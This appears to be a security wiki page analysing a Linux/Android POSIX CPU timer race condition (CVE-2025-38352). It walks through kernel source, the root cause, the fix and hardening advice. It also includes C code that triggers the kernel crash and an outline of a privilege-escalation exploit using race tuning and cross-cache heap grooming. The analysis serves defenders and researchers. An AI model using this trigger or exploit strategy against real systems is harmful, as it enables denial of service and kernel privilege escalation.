POSIX CPU Timers TOCTOU race (CVE-2025-38352)

This page documents a TOCTOU race condition in Linux/Android POSIX CPU timers that can corrupt timer state and crash the kernel, and under some circumstances be steered toward privilege escalation.

Affected component: kernel/time/posix-cpu-timers.c
Primitive: expiry vs deletion race under task exit
Config sensitive: CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n (IRQ-context expiry path)

Quick internals recap (relevant for exploitation) - Three CPU clocks drive accounting for timers via cpu_clock_sample(): - CPUCLOCK_PROF: utime + stime - CPUCLOCK_VIRT: utime only - CPUCLOCK_SCHED: task_sched_runtime() - Timer creation wires a timer to a task/pid and initializes the timerqueue nodes:

static int posix_cpu_timer_create(struct k_itimer *new_timer) {
    struct pid *pid;
    rcu_read_lock();
    pid = pid_for_clock(new_timer->it_clock, false);
    if (!pid) { rcu_read_unlock(); return -EINVAL; }
    new_timer->kclock = &clock_posix_cpu;
    timerqueue_init(&new_timer->it.cpu.node);
    new_timer->it.cpu.pid = get_pid(pid);
    rcu_read_unlock();
    return 0;
}

Arming inserts into a per-base timerqueue and may update the next-expiry cache:

static void arm_timer(struct k_itimer *timer, struct task_struct *p) {
    struct posix_cputimer_base *base = timer_base(timer, p);
    struct cpu_timer *ctmr = &timer->it.cpu;
    u64 newexp = cpu_timer_getexpires(ctmr);
    if (!cpu_timer_enqueue(&base->tqhead, ctmr)) return;
    if (newexp < base->nextevt) base->nextevt = newexp;
}

Fast path avoids expensive processing unless cached expiries indicate possible firing:

static inline bool fastpath_timer_check(struct task_struct *tsk) {
    struct posix_cputimers *pct = &tsk->posix_cputimers;
    if (!expiry_cache_is_inactive(pct)) {
        u64 samples[CPUCLOCK_MAX];
        task_sample_cputime(tsk, samples);
        if (task_cputimers_expired(samples, pct))
            return true;
    }
    return false;
}

Expiration collects expired timers, marks them firing, moves them off the queue; actual delivery is deferred:

#define MAX_COLLECTED 20
static u64 collect_timerqueue(struct timerqueue_head *head,
                              struct list_head *firing, u64 now) {
    struct timerqueue_node *next; int i = 0;
    while ((next = timerqueue_getnext(head))) {
        struct cpu_timer *ctmr = container_of(next, struct cpu_timer, node);
        u64 expires = cpu_timer_getexpires(ctmr);
        if (++i == MAX_COLLECTED || now < expires) return expires;
        ctmr->firing = 1;                           // critical state
        rcu_assign_pointer(ctmr->handling, current);
        cpu_timer_dequeue(ctmr);
        list_add_tail(&ctmr->elist, firing);
    }
    return U64_MAX;
}

Two expiry-processing modes - CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y: expiry is deferred via task_work on the target task - CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n: expiry handled directly in IRQ context

POSIX CPU timer run paths

void run_posix_cpu_timers(void) {
    struct task_struct *tsk = current;
    __run_posix_cpu_timers(tsk);
}
#ifdef CONFIG_POSIX_CPU_TIMERS_TASK_WORK
static inline void __run_posix_cpu_timers(struct task_struct *tsk) {
    if (WARN_ON_ONCE(tsk->posix_cputimers_work.scheduled)) return;
    tsk->posix_cputimers_work.scheduled = true;
    task_work_add(tsk, &tsk->posix_cputimers_work.work, TWA_RESUME);
}
#else
static inline void __run_posix_cpu_timers(struct task_struct *tsk) {
    lockdep_posixtimer_enter();
    handle_posix_cpu_timers(tsk);                  // IRQ-context path
    lockdep_posixtimer_exit();
}
#endif

In the IRQ-context path, the firing list is processed outside sighand

IRQ-context handling path

static void handle_posix_cpu_timers(struct task_struct *tsk) {
    struct k_itimer *timer, *next; unsigned long flags, start;
    LIST_HEAD(firing);
    if (!lock_task_sighand(tsk, &flags)) return;   // may fail on exit
    do {
        start = READ_ONCE(jiffies); barrier();
        check_thread_timers(tsk, &firing);
        check_process_timers(tsk, &firing);
    } while (!posix_cpu_timers_enable_work(tsk, start));
    unlock_task_sighand(tsk, &flags);              // race window opens here
    list_for_each_entry_safe(timer, next, &firing, it.cpu.elist) {
        int cpu_firing;
        spin_lock(&timer->it_lock);
        list_del_init(&timer->it.cpu.elist);
        cpu_firing = timer->it.cpu.firing;         // read then reset
        timer->it.cpu.firing = 0;
        if (likely(cpu_firing >= 0)) cpu_timer_fire(timer);
        rcu_assign_pointer(timer->it.cpu.handling, NULL);
        spin_unlock(&timer->it_lock);
    }
}

Root cause: TOCTOU between IRQ-time expiry and concurrent deletion under task exit Preconditions - CONFIG_POSIX_CPU_TIMERS_TASK_WORK is disabled (IRQ path in use) - The target task is exiting but not fully reaped - Another thread concurrently calls posix_cpu_timer_del() for the same timer

Sequence 1) update_process_times() triggers run_posix_cpu_timers() in IRQ context for the exiting task. 2) collect_timerqueue() sets ctmr->firing = 1 and moves the timer to the temporary firing list. 3) handle_posix_cpu_timers() drops sighand via unlock_task_sighand() to deliver timers outside the lock. 4) Immediately after unlock, the exiting task can be reaped; a sibling thread executes posix_cpu_timer_del(). 5) In this window, posix_cpu_timer_del() may fail to acquire state via cpu_timer_task_rcu()/lock_task_sighand() and thus skip the normal in-flight guard that checks timer->it.cpu.firing. Deletion proceeds as if not firing, corrupting state while expiry is being handled, leading to crashes/UB.

Why TASK_WORK mode is safe by design - With CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y, expiry is deferred to task_work; exit_task_work runs before exit_notify, so the IRQ-time overlap with reaping does not occur. - Even then, if the task is already exiting, task_work_add() fails; gating on exit_state makes both modes consistent.

Fix (Android common kernel) and rationale - Add an early return if current task is exiting, gating all processing:

// kernel/time/posix-cpu-timers.c (Android common kernel commit 157f357d50b5038e5eaad0b2b438f923ac40afeb)
if (tsk->exit_state)
    return;

This prevents entering handle_posix_cpu_timers() for exiting tasks, eliminating the window where posix_cpu_timer_del() could miss it.cpu.firing and race with expiry processing.

Impact - Kernel memory corruption of timer structures during concurrent expiry/deletion can yield immediate crashes (DoS) and is a strong primitive toward privilege escalation due to arbitrary kernel-state manipulation opportunities.

Triggering the bug (safe, reproducible conditions) Build/config - Ensure CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n and use a kernel without the exit_state gating fix.

Runtime strategy - Target a thread that is about to exit and attach a CPU timer to it (per-thread or process-wide clock): - For per-thread: timer_create(CLOCK_THREAD_CPUTIME_ID, ...) - For process-wide: timer_create(CLOCK_PROCESS_CPUTIME_ID, ...) - Arm with a very short initial expiration and small interval to maximize IRQ-path entries:

static timer_t t;
static void setup_cpu_timer(void) {
    struct sigevent sev = {0};
    sev.sigev_notify = SIGEV_SIGNAL;    // delivery type not critical for the race
    sev.sigev_signo = SIGUSR1;
    if (timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &t)) perror("timer_create");
    struct itimerspec its = {0};
    its.it_value.tv_nsec = 1;           // fire ASAP
    its.it_interval.tv_nsec = 1;        // re-fire
    if (timer_settime(t, 0, &its, NULL)) perror("timer_settime");
}

From a sibling thread, concurrently delete the same timer while the target thread exits:

void *deleter(void *arg) {
    for (;;) (void)timer_delete(t);     // hammer delete in a loop
}

Race amplifiers: high scheduler tick rate, CPU load, repeated thread exit/re-create cycles. The crash typically manifests when posix_cpu_timer_del() skips noticing firing due to failing task lookup/locking right after unlock_task_sighand().

Detection and hardening - Mitigation: apply the exit_state guard; prefer enabling CONFIG_POSIX_CPU_TIMERS_TASK_WORK when feasible. - Observability: add tracepoints/WARN_ONCE around unlock_task_sighand()/posix_cpu_timer_del(); alert when it.cpu.firing==1 is observed together with failed cpu_timer_task_rcu()/lock_task_sighand(); watch for timerqueue inconsistencies around task exit.

Audit hotspots (for reviewers) - update_process_times() → run_posix_cpu_timers() (IRQ) - __run_posix_cpu_timers() selection (TASK_WORK vs IRQ path) - collect_timerqueue(): sets ctmr->firing and moves nodes - handle_posix_cpu_timers(): drops sighand before firing loop - posix_cpu_timer_del(): relies on it.cpu.firing to detect in-flight expiry; this check is skipped when task lookup/lock fails during exit/reap

Notes for exploitation research - The disclosed behavior is a reliable kernel crash primitive; turning it into privilege escalation typically needs an additional controllable overlap (object lifetime or write-what-where influence) beyond the scope of this summary. Treat any PoC as potentially destabilizing and run only in emulators/VMs.

Chronomaly exploit strategy (priv-esc without fixed text offsets)

Tested target & configs: x86_64 v5.10.157 under QEMU (4 cores, 3 GB RAM). Critical options: CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n, CONFIG_PREEMPT=y, CONFIG_SLAB_MERGE_DEFAULT=n, DEBUG_LIST=n, BUG_ON_DATA_CORRUPTION=n, LIST_HARDENED=n.
Race steering with CPU timers: A racing thread (race_func()) burns CPU while CPU timers fire; free_func() polls SIGUSR1 to confirm if the timer fired. Tune CPU_USAGE_THRESHOLD so signals arrive only sometimes (intermittent "Parent raced too late/too early" messages). If timers fire every attempt, lower the threshold; if they never fire before thread exit, raise it.
Dual-process alignment into send_sigqueue(): Parent/child processes try to hit a second race window inside send_sigqueue(). The parent sleeps PARENT_SETTIME_DELAY_US microseconds before arming timers; adjust downward when you mostly see "Parent raced too late" and upward when you mostly see "Parent raced too early". Seeing both indicates you are straddling the window; success is expected within ~1 minute once tuned.
Cross-cache UAF replacement: The exploit frees a struct sigqueue then grooms allocator state (sigqueue_crosscache_preallocs()) so both the dangling uaf_sigqueue and the replacement realloc_sigqueue land on a pipe buffer data page (cross-cache reallocation). Reliability assumes a quiet kernel with few prior sigqueue allocations; if per-CPU/per-node partial slab pages already exist (busy systems), the replacement will miss and the chain fails. The author intentionally left it unoptimized for noisy kernels.

POSIX CPU Timers TOCTOU race (CVE-2025-38352)

Chronomaly exploit strategy (priv-esc without fixed text offsets)

See also

References